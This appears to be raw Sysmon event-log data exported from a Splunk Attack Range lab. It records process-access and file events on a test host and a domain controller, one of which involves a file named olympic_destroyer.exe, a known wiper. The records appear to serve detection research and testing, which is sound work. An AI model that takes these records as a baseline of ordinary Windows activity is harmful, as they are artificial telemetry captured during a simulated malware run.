11:14:49.142{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221060Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.142{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221059Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.142{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221058Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.142{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221057Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.142{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221056Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.142{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221055Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.142{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1729-6216-0505-000000003902}528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221054Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.142{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1729-6216-0505-000000003902}528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221053Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.144{4F8D34B0-1729-6216-0505-000000003902}528C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000221052Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:49.017{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32C483EAEFAF7D88895839706BBB4DD9,SHA256=1B45C00CBD4A54E617E9C6B746BE238F263C5A17F72F4CCD52931E43D730C33E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297157Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:50.521{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C675D8D1A94095167AB668BF909BD44,SHA256=7F6118077974AC46EB1B49A778E9E84F5438D52F4EC4C01A14DD639DA537AE7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221082Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:50.283{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F9F4F663C662FE7D649708C768797072,SHA256=DAD0F15CBB36A5A087473FF1700B234A012114EC9E82941624DE30C336A8DC53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221081Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:50.283{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F25A137E0537404A851DCBC4B5B2C828,SHA256=8623F259435F361192C73C97BCDAD37F7E6A4F80496661A2E9AF8A5475C1FF79,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297160Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:51.567{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000297159Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:51.567{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60489BC332D3A117A61E755DBE9949A1,SHA256=794B05A780864A2550B4150D587E4FB87B6C15092FC9DC529365FF33AF713088,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000297158Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:51.567{C8EA50B7-1710-6216-1B07-000000003802}6188C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000221096Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:51.299{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0D13EFB346F2479321D37CB37456898,SHA256=67FEBD8788EF27E95AE0C1EE2FCA5EE022CC281E10016C081B69D0FC6EACD317,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000221095Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:51.236{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-172B-6216-0705-000000003902}3972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221094Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:51.236{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221093Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:51.236{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221092Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:51.236{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221091Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:51.236{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221090Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:51.236{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221089Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:51.236{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221088Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:51.236{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221087Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:51.236{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221086Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:51.236{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221085Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:51.236{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-172B-6216-0705-000000003902}3972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000221084Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:51.236{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-172B-6216-0705-000000003902}3972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000221083Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:51.237{4F8D34B0-172B-6216-0705-000000003902}3972C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program 